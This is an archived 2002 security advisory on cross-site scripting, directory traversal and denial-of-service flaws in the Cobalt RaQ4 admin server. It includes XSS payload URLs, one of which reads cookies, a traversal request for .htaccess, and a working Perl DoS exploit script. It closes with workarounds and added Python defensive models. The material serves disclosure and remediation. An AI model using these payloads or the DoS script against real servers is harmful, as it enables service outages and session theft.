
Cobalt Raq4 Cross site scripting, directory traversal and DoS vulnerabilities
1st Mar 2002 [SBWID-5156]
COMMAND

	Cobalt Raq4 Cross site scripting, directory traversal and DoS vulnerabilities

SYSTEMS AFFECTED

	Version: RAQ 4 Server Management.

PROBLEM

	Alex Hernandez found the following vulnerabilities in the Sun Cobalt RaQ,
	a server appliance for Internet Service Providers (ISPs).

	It can host up to 200 individual websites or be dedicated to a single
	medium or large customer. This versatility lets a service provider invest
	in a single piece of hardware while migrating business customers up to
	dedicated servers.

	There are three vulnerabilities:

	 a) Cross-site scripting.
	 b) Directory traversal.
	 c) Denial of service (exploit released).

	Cobalt's service.cgi does not sanitize the incoming "service" search
	parameter: HTML tags or JavaScript supplied in the request are echoed
	into the result page without being filtered for dangerous content. A
	similar problem occurs with x.cgi, which includes unfiltered input in
	the resulting title search.

	The CGI files are open source. The flaw allows attackers to insert
	malicious content into existing web pages (cross-site scripting).
	

	

	Affected CGI files:

	alert.cgi
	service.cgi

	EXAMPLES:

	http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<h1>Hello!</h1><script>alert('hello')</script>
	http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<script>alert('Microsoft%20hole')</script>
	http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert(document.domain)>
	http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<script>alert(document.cookie)</script>

	LOCATION:

	http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Ealert(document.location)%3C/script%3E

	COOKIES:

	http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Ealert(document.cookie)%3C/script%3E

	TAG IMAGES:

	http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert(document.domain)>

	WRITE ON DOCUMENT:

	http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<SCRIPT>document.write(document.domain)</SCRIPT>


	 ------oOo--------

	

	Directory traversal to configuration files.

	Exploit:

	http://10.0.0.1:81/.cobalt/sysManage/../admin/.htaccess

	The server returns the access file:

	# Access file for /usr/admserv/html/.cobalt/admin/ (admin  )
	order allow,deny
	allow from all
	require user admin
	Authname CobaltRaQ
	Authtype Basic

	The default directory on the server is "/usr/admserv/html/.cobalt/admin".
	The same traversal can be pointed at any other directory to retrieve
	restricted files, passwords and user profiles.
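	The advisory's request reaches the protected admin tree because the access rule is matched against the literal path rather than the canonical one. The following Python model is an added example, not the RaQ's code: it normalizes the request path first and then applies the two rules this page describes (the "require user admin" restriction from the leaked .htaccess and the "never serve .htaccess" rule from the SOLUTION section). The /.cobalt/admin prefix comes from the advisory; the page name in the demo loop is constructed.

```python
import posixpath
from urllib.parse import unquote

# Constructed model of the RaQ admin server on port 81: the per-directory
# .htaccess shown in the advisory puts "require user admin" on /.cobalt/admin.
PROTECTED_DIRS = ("/.cobalt/admin",)


def normalize_request_path(raw_path):
    """Percent-decode the path and collapse '.' and '..' segments.
    Raises ValueError if the path is relative or climbs above the root."""
    path = unquote(raw_path)
    if not path.startswith("/"):
        raise ValueError("request path must be absolute")
    parts = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not parts:
                raise ValueError("traversal above document root")
            parts.pop()
        else:
            parts.append(seg)
    return "/" + "/".join(parts)


def authorize(raw_path, user=None):
    """Decide on the canonical path, never the literal one.
    Returns (allowed, canonical_path_or_reason)."""
    try:
        canon = normalize_request_path(raw_path)
    except ValueError as exc:
        return False, "reject: %s" % exc
    # Rule from the SOLUTION section: .htaccess is never served to a browser.
    if posixpath.basename(canon) == ".htaccess":
        return False, "reject: .htaccess is never served"
    # Rule from the leaked .htaccess itself: the admin tree needs user "admin".
    for d in PROTECTED_DIRS:
        if (canon == d or canon.startswith(d + "/")) and user != "admin":
            return False, "reject: admin authentication required"
    return True, canon


if __name__ == "__main__":
    for req in ("/.cobalt/sysManage/../admin/.htaccess",
                "/.cobalt/sysManage/%2e%2e/admin/",
                "/.cobalt/admin/page.cgi",      # constructed page name
                "/../etc/passwd"):
        print(req, "->", authorize(req))
```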
	

	

	

	 ------oOo--------

	

	Denial of service.

	Proof of concept:

	The server crashes after receiving a very long URL, for example:

	http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=/AAAAAAAAA...(Ax100000)...AAA

	The service crashes and the administrator has to restart it.
	

	

	 ------oOo-------------
	 Exploit Code DoS Cobalt4_DoS.pl
	 ------oOo-------------

	#!/usr/bin/perl
	#
	# Simple script to send a long 'A^s' command to the server,
	# resulting in the server crashing.
	#
	# Cobalt RAQ DoS v4 proof-of-concept exploit.
	# By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.
	#
	# Thanks all the people from Spain and Argentina.
	# Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti.
	#
	#
	# Usage: perl -x Cobalt4_DoS.pl -s <server>
	#
	# Example:
	#
	# perl -x Cobalt4_DoS.pl -s 10.0.0.1
	#
	# Crash was successful !
	#

	use Getopt::Std;
	use IO::Socket;

	print("\nCobalt RAQ DoS v4.0 DoS exploit (c)2002.\n");
	print("Alex Hernandez al3xhernandez\@ureach.com\n\n");

	getopts('s:', \%args);
	if(!defined($args{s})){&usage;}

	my ($serv,$port,$def,$num,$data,$buf,$in_addr,$paddr,$proto);

	$def = "A";
	$num = "100000";
	$data .= $def x $num;
	$serv = $args{s};
	$port = 81; # change the port if your version listens elsewhere
	$buf = "GET /cgi-bin/.cobalt/alert/service.cgi?service=$data /HTTP/1.0\r\n\r\n";

	$in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
	$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");
	$proto = getprotobyname('tcp') || die("Error: $!\n");

	socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");
	connect(S, $paddr) || die ("Error: $!");
	select(S); $| = 1; select(STDOUT);
	print S "$buf";

	print("\nCrash was successful !\n\n");

	sub usage {die("\n\nUsage: perl -x $0 -s <server>\n\n");}


SOLUTION

	Workaround:

	 1) Delete service.cgi from the system, or disable its execution.
	 2) Delete alert.cgi from the system, or disable its execution.

	 Update (04 March 2002)
	 ======

	

	Other workaround by Peter N. Go [http://CGI-City.net/]
	

	

	------------------------

	1. CROSS SITE SCRIPTING.

	------------------------

	

	Possible workaround: Instead of deleting or disabling the "service.cgi"
	file, edit the file and add a line that strips out HTML tags. Something
	like this:

	$service =~ s/<([^>])*>//g;

	This may be added after this line in the code:

	my $service = $q->param('service');

	

	

	-----------------------------

	2. TRAVERSAL VULNERABILITIES.

	-----------------------------

	

	Possible workaround: Create an .htaccess file in  the  /usr/admserv/html
	directory with the following entry:
	

	<Files .htaccess>

	    Order allow,deny

	    Deny from all

	</Files>

	

	This should prevent all .htaccess files from being  viewed  by  any  web
	browser.
	

	

	---------------------

	3. DENIAL OF SERVICE.

	---------------------

	

	Possible workaround: Again, in the "service.cgi" file, add a simple
	check for the length of the string passed. In this example, if the
	string is > 500 chars, the program exits.

	if (length($service) > 500) { exit; }
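	The two one-line workarounds for service.cgi (the tag-stripping regex and the 500-character cutoff) rendered as a small Python model, added here as an example and not code from the advisory or the RaQ. The sample inputs are payloads quoted in the advisory plus a constructed benign value; the escaping function is an assumed stronger fix for the same echo, included to show what stripping discards and escaping keeps, and is not something the workaround author proposes.

```python
import html
import re

# The advisory's Perl workaround, $service =~ s/<([^>])*>//g;, as a Python regex.
TAG_RE = re.compile(r"<([^>])*>")
# The advisory's DoS cutoff: if (length($service) > 500) { exit; }
MAX_SERVICE_LEN = 500


def strip_tags(value):
    """Lossy fix from the advisory: delete anything shaped like an HTML tag."""
    return TAG_RE.sub("", value)


def escape_for_html(value):
    """Assumed stronger fix (not from the advisory): keep the text but make
    '<', '>', '&' and quotes inert when echoed into an HTML body."""
    return html.escape(value, quote=True)


def check_service_param(value):
    """Length check first, then escaping. Returns (accepted, safe_value);
    over-long input is rejected before any other processing."""
    if len(value) > MAX_SERVICE_LEN:
        return False, ""
    return True, escape_for_html(value)


# Constructed inputs: payloads quoted in the advisory plus a benign service
# name containing '<', to show what stripping throws away and escaping keeps.
SAMPLES = {
    "script": "<script>alert(document.cookie)</script>",
    "img": "<img src=javascript:alert(document.domain)>",
    "benign": "smtp <primary>",
    "dos": "/" + "A" * 100000,
}


def run_samples():
    """Apply both fixes to every sample; returns {name: (accepted, stripped, escaped)}."""
    out = {}
    for name, raw in SAMPLES.items():
        accepted, safe = check_service_param(raw)
        out[name] = (accepted, strip_tags(raw) if accepted else "", safe)
    return out


if __name__ == "__main__":
    for name, row in run_samples().items():
        print(name, row)
```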

	
